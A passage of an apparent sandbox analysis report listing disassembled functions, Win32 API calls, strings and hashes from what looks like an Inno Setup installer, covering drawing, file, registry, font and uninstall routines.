                                                                  Function 00456B40 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 99libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,00456CA5,?,?,00000031,?), ref: 00456B68
                                                                  • GetProcAddress.KERNEL32(00000000,OLEAUT32.DLL), ref: 00456B6E
                                                                  • LoadTypeLib.OLEAUT32(00000000,?), ref: 00456BBB
                                                                    • Part of subcall function 00453470: GetLastError.KERNEL32(00000000,00454005,00000005,00000000,0045403A,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004978B1,00000000), ref: 00453473
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: AddressErrorHandleLastLoadModuleProcType
                                                                  • String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
                                                                  • API String ID: 1914119943-2711329623
                                                                  • Opcode ID: 429f9213fdce0867704162136d35381b6641e802cf297fe1828a7e481cb37b2a
                                                                  • Instruction ID: 90c7a9fdd6b9eff4f50a7868ac1bc5a0a48bbd230e3c9f86fc21845b06ed4ed7
                                                                  • Opcode Fuzzy Hash: 429f9213fdce0867704162136d35381b6641e802cf297fe1828a7e481cb37b2a
                                                                  • Instruction Fuzzy Hash: 1B31B271A00A04AF9702EFAACC51D5BB7BDEB89746752846AFC04D3752DA38DD04C768
                                                                  Function 00416D78 Relevance: 15.2, APIs: 10, Instructions: 167windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RectVisible.GDI32(?,?), ref: 00416E0B
                                                                  • SaveDC.GDI32(?), ref: 00416E1F
                                                                  • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00416E42
                                                                  • RestoreDC.GDI32(?,?), ref: 00416E5D
                                                                  • CreateSolidBrush.GDI32(00000000), ref: 00416EDD
                                                                  • FrameRect.USER32(?,?,?), ref: 00416F10
                                                                  • DeleteObject.GDI32(?), ref: 00416F1A
                                                                  • CreateSolidBrush.GDI32(00000000), ref: 00416F2A
                                                                  • FrameRect.USER32(?,?,?), ref: 00416F5D
                                                                  • DeleteObject.GDI32(?), ref: 00416F67
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                                                  • String ID:
                                                                  • API String ID: 375863564-0
                                                                  • Opcode ID: 4f2037b5eabd4c0ddd7adb5546328da8476fa2c27bed59ce0fc3228c4463e070
                                                                  • Instruction ID: 3aa003abb57efcc62207c922e0442432c52dbc4458161ac97ea4a6727b5fec63
                                                                  • Opcode Fuzzy Hash: 4f2037b5eabd4c0ddd7adb5546328da8476fa2c27bed59ce0fc3228c4463e070
                                                                  • Instruction Fuzzy Hash: 7F512B716086459FDB50EF29C8C0B9777E8AF48314F15466ABD889B287C738EC81CB99
                                                                  Function 00404ABF Relevance: 15.1, APIs: 10, Instructions: 122fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B46
                                                                  • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B6A
                                                                  • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B86
                                                                  • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00404BA7
                                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00404BD0
                                                                  • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00404BDA
                                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00404BFA
                                                                  • GetFileType.KERNEL32(?,000000F5), ref: 00404C11
                                                                  • CloseHandle.KERNEL32(?,?,000000F5), ref: 00404C2C
                                                                  • GetLastError.KERNEL32(000000F5), ref: 00404C46
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                  • String ID:
                                                                  • API String ID: 1694776339-0
                                                                  • Opcode ID: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                  • Instruction ID: 0555156f4d2a620bb114dc01d937536d57074fdea11cd86abdfeb4dd56d828b4
                                                                  • Opcode Fuzzy Hash: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                  • Instruction Fuzzy Hash: 3741B3F02093009AF7305E248905B2375E5EBC0755F208E3FE296BA6E0D7BDE8458B1D
                                                                  Function 004221E0 Relevance: 15.1, APIs: 10, Instructions: 74windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetSystemMenu.USER32(00000000,00000000), ref: 0042222B
                                                                  • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00422249
                                                                  • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422256
                                                                  • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422263
                                                                  • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422270
                                                                  • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 0042227D
                                                                  • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 0042228A
                                                                  • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 00422297
                                                                  • EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 004222B5
                                                                  • EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 004222D1
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$Delete$EnableItem$System
                                                                  • String ID:
                                                                  • API String ID: 3985193851-0
                                                                  • Opcode ID: 5abdbd2448cd02f00dbd9e0a18e72027fb78d1268677703bf36b2e23ad6afd93
                                                                  • Instruction ID: 3d512aed001548988d9f6823c75d43677a46120aeb5bb01c9b252fa7414fdf33
                                                                  • Opcode Fuzzy Hash: 5abdbd2448cd02f00dbd9e0a18e72027fb78d1268677703bf36b2e23ad6afd93
                                                                  • Instruction Fuzzy Hash: 692144703407447AE720E724DD8BFABBBD8AB04708F1455A5B6487F6D3C2F9AB804698
                                                                  Function 00480E18 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 175windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FreeLibrary.KERNEL32(10000000), ref: 00480FD5
                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00480FE9
                                                                  • SendNotifyMessageA.USER32(000403E6,00000496,00002710,00000000), ref: 0048105B
                                                                  Strings
                                                                  • Restarting Windows., xrefs: 00481036
                                                                  • Not restarting Windows because Setup is being run from the debugger., xrefs: 0048100A
                                                                  • Deinitializing Setup., xrefs: 00480E36
                                                                  • GetCustomSetupExitCode, xrefs: 00480E75
                                                                  • DeinitializeSetup, xrefs: 00480ED1
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: FreeLibrary$MessageNotifySend
                                                                  • String ID: DeinitializeSetup$Deinitializing Setup.$GetCustomSetupExitCode$Not restarting Windows because Setup is being run from the debugger.$Restarting Windows.
                                                                  • API String ID: 3817813901-1884538726
                                                                  • Opcode ID: aeb7eeed0520e5db2a06f6f9575c7ce6fe4ce849ef8be63e157f84bdb35f0c9d
                                                                  • Instruction ID: 3a7bead0d2027120b4b43806ed62f13ca717c16daae07b60498e62be9a129c9c
                                                                  • Opcode Fuzzy Hash: aeb7eeed0520e5db2a06f6f9575c7ce6fe4ce849ef8be63e157f84bdb35f0c9d
                                                                  • Instruction Fuzzy Hash: 6E5191307042409FD711EB65D9A5B6E77E8EB5A304F50887BF900D73A2CB38A849CB9D
                                                                  Function 004614B4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 82COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SHGetMalloc.SHELL32(?), ref: 004614EF
                                                                  • GetActiveWindow.USER32 ref: 00461553
                                                                  • CoInitialize.OLE32(00000000), ref: 00461567
                                                                  • SHBrowseForFolder.SHELL32(?), ref: 0046157E
                                                                  • CoUninitialize.OLE32(004615BF,00000000,?,?,?,?,?,00000000,00461643), ref: 00461593
                                                                  • SetActiveWindow.USER32(?,004615BF,00000000,?,?,?,?,?,00000000,00461643), ref: 004615A9
                                                                  • SetActiveWindow.USER32(?,?,004615BF,00000000,?,?,?,?,?,00000000,00461643), ref: 004615B2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: ActiveWindow$BrowseFolderInitializeMallocUninitialize
                                                                  • String ID: A
                                                                  • API String ID: 2684663990-3554254475
                                                                  • Opcode ID: 1a2b14b0ce593c78e5b77d196e88522ccd9c3a7e94d83b7f20090faf3fe85af4
                                                                  • Instruction ID: 3b7aa7431835c7c777c0b5d0eb650662cb24b1be5a668883a221ebb7e5be7499
                                                                  • Opcode Fuzzy Hash: 1a2b14b0ce593c78e5b77d196e88522ccd9c3a7e94d83b7f20090faf3fe85af4
                                                                  • Instruction Fuzzy Hash: 05310F70D00218AFDB00EFA6D885A9EBBF8EF09304F55847AF415E7251E6789A04CB5A
                                                                  Function 004727E0 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 67COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetFileAttributesA.KERNEL32(00000000,00000000,004728A1,?,?,?,00000008,00000000,00000000,00000000,?,00472AFD,?,?,00000000,00472D6C), ref: 00472804
                                                                    • Part of subcall function 0042CD8C: GetPrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0042CE02
                                                                    • Part of subcall function 00406F40: DeleteFileA.KERNEL32(00000000,0049B628,00497BFD,00000000,00497C52,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F4B
                                                                  • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,004728A1,?,?,?,00000008,00000000,00000000,00000000,?,00472AFD), ref: 0047287B
                                                                  • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,004728A1,?,?,?,00000008,00000000,00000000,00000000), ref: 00472881
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: File$Attributes$DeleteDirectoryPrivateProfileRemoveString
                                                                  • String ID: .ShellClassInfo$CLSID2$desktop.ini$target.lnk${0AFACED1-E828-11D1-9187-B532F1E9575D}
                                                                  • API String ID: 884541143-1710247218
                                                                  • Opcode ID: 1868d1ec2436a7bbc0d7041c4ffcd453102d48d96e31a7c571d0111a3cf3086d
                                                                  • Instruction ID: 279d6da86f281c7a9c803d865f3c4407023b84140d9db6ac64499a617a38ab60
                                                                  • Opcode Fuzzy Hash: 1868d1ec2436a7bbc0d7041c4ffcd453102d48d96e31a7c571d0111a3cf3086d
                                                                  • Instruction Fuzzy Hash: 8A11E270B005147BDB01F6658D82BAE73ACDB45754F62827BB804A72C1DB7C9E028A1E
                                                                  Function 0045D0D4 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 41libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetProcAddress.KERNEL32(00000000,inflateInit_), ref: 0045D0DD
                                                                  • GetProcAddress.KERNEL32(00000000,inflate), ref: 0045D0ED
                                                                  • GetProcAddress.KERNEL32(00000000,inflateEnd), ref: 0045D0FD
                                                                  • GetProcAddress.KERNEL32(00000000,inflateReset), ref: 0045D10D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc
                                                                  • String ID: inflate$inflateEnd$inflateInit_$inflateReset
                                                                  • API String ID: 190572456-3516654456
                                                                  • Opcode ID: dbb685680a16ba3fccec3577b7ec4e51ea72545e87c1ddc4c02616cb3473d65c
                                                                  • Instruction ID: 76eb10cdb098e6f3740e4570fa0e0ca14f9d337f92906be3718b60d9f676c82f
                                                                  • Opcode Fuzzy Hash: dbb685680a16ba3fccec3577b7ec4e51ea72545e87c1ddc4c02616cb3473d65c
                                                                  • Instruction Fuzzy Hash: 800112B0D01B00DAE724DFB69DD572736A5ABA4306F10C13B9C49D62A2D77D0859DF2C
                                                                  Function 0041A8D4 Relevance: 13.7, APIs: 9, Instructions: 176windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetBkColor.GDI32(?,00000000), ref: 0041A9B1
                                                                  • 73A24D40.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020,?,00000000), ref: 0041A9EB
                                                                  • SetBkColor.GDI32(?,?), ref: 0041AA00
                                                                  • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041AA4A
                                                                  • SetTextColor.GDI32(00000000,00000000), ref: 0041AA55
                                                                  • SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041AA65
                                                                  • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041AAA4
                                                                  • SetTextColor.GDI32(00000000,00000000), ref: 0041AAAE
                                                                  • SetBkColor.GDI32(00000000,?), ref: 0041AABB
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Color$StretchText
                                                                  • String ID:
                                                                  • API String ID: 2984075790-0
                                                                  • Opcode ID: 33ed346255d2d01e66c926e049e6617e656dc0545b4cfc6f34fc57e337ce283f
                                                                  • Instruction ID: f35f62ab74b2522f6310a7e8d9a92b24202350a16c816e0881424610f10e5e30
                                                                  • Opcode Fuzzy Hash: 33ed346255d2d01e66c926e049e6617e656dc0545b4cfc6f34fc57e337ce283f
                                                                  • Instruction Fuzzy Hash: 9F61C7B5A00105AFCB40EFADD985E9EB7F8EF08314B1085AAF518DB262C735ED408F58
                                                                  Function 00457EE4 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 126COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0042D8BC: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8CF
                                                                  • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00458098,?, /s ",?,regsvr32.exe",?,00458098), ref: 0045800A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CloseDirectoryHandleSystem
                                                                  • String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
                                                                  • API String ID: 2051275411-1862435767
                                                                  • Opcode ID: cb06b037a9936da38b1ea299305d673950aed566f5e97164fe1c7bb630972389
                                                                  • Instruction ID: 56a02eb2220928eb4cb829bb83c6f501b915172eb664170f25c545f5d36e4a23
                                                                  • Opcode Fuzzy Hash: cb06b037a9936da38b1ea299305d673950aed566f5e97164fe1c7bb630972389
                                                                  • Instruction Fuzzy Hash: 80413670A003086BDB10EFE5D842B8EB7B9AF44705F50407FA904BB297DF789A0D8B19
                                                                  Function 0044D170 Relevance: 13.6, APIs: 9, Instructions: 90COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • OffsetRect.USER32(?,00000001,00000001), ref: 0044D1A1
                                                                  • GetSysColor.USER32(00000014), ref: 0044D1A8
                                                                  • SetTextColor.GDI32(00000000,00000000), ref: 0044D1C0
                                                                  • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D1E9
                                                                  • OffsetRect.USER32(?,000000FF,000000FF), ref: 0044D1F3
                                                                  • GetSysColor.USER32(00000010), ref: 0044D1FA
                                                                  • SetTextColor.GDI32(00000000,00000000), ref: 0044D212
                                                                  • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D23B
                                                                  • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D266
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Text$Color$Draw$OffsetRect
                                                                  • String ID:
                                                                  • API String ID: 1005981011-0
                                                                  • Opcode ID: c5a987219403fb39552b8629345f90501b93a362f94b22de4e5dcdb6506d09d4
                                                                  • Instruction ID: 3fa3981ec5684e07db84b004592342e93505d63b705e9416633fcf0049301179
                                                                  • Opcode Fuzzy Hash: c5a987219403fb39552b8629345f90501b93a362f94b22de4e5dcdb6506d09d4
                                                                  • Instruction Fuzzy Hash: 6A21CEB46415047FC710FB2ACC8AE8BBBECDF19319B00457AB958EB392C678DE404668
                                                                  Function 00495A00 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90sleepsynchronizationthreadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00450900: SetEndOfFile.KERNEL32(?,?,0045C162,00000000,0045C2ED,?,00000000,00000002,00000002), ref: 00450907
                                                                    • Part of subcall function 00406F40: DeleteFileA.KERNEL32(00000000,0049B628,00497BFD,00000000,00497C52,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F4B
                                                                  • GetWindowThreadProcessId.USER32(00000000,?), ref: 00495A91
                                                                  • OpenProcess.KERNEL32(00100000,00000000,?,00000000,?), ref: 00495AA5
                                                                  • SendNotifyMessageA.USER32(00000000,0000054D,00000000,00000000), ref: 00495ABF
                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00495ACB
                                                                  • CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00495AD1
                                                                  • Sleep.KERNEL32(000001F4,00000000,0000054D,00000000,00000000,00000000,?), ref: 00495AE4
                                                                  Strings
                                                                  • Deleting Uninstall data files., xrefs: 00495A07
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: FileProcess$CloseDeleteHandleMessageNotifyObjectOpenSendSingleSleepThreadWaitWindow
                                                                  • String ID: Deleting Uninstall data files.
                                                                  • API String ID: 1570157960-2568741658
                                                                  • Opcode ID: 181e5138e971e41075a5f0d412266dd8d351837d1b4a26c408709cd589ae8453
                                                                  • Instruction ID: 8fd25edfc014547dd13852670f785c7791f766ba0082412c3ee421c8584d85d8
                                                                  • Opcode Fuzzy Hash: 181e5138e971e41075a5f0d412266dd8d351837d1b4a26c408709cd589ae8453
                                                                  • Instruction Fuzzy Hash: 6D217371304610AFEB11E7A6ECC6B2736A8E758328F61453BB5019A1E2D67CAC04CB6C
                                                                  Function 0047001C Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 89registrywindowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                                  • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,00470119,?,?,?,?,00000000), ref: 00470083
                                                                  • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,00470119), ref: 0047009A
                                                                  • AddFontResourceA.GDI32(00000000), ref: 004700B7
                                                                  • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 004700CB
                                                                  Strings
                                                                  • AddFontResource, xrefs: 004700D5
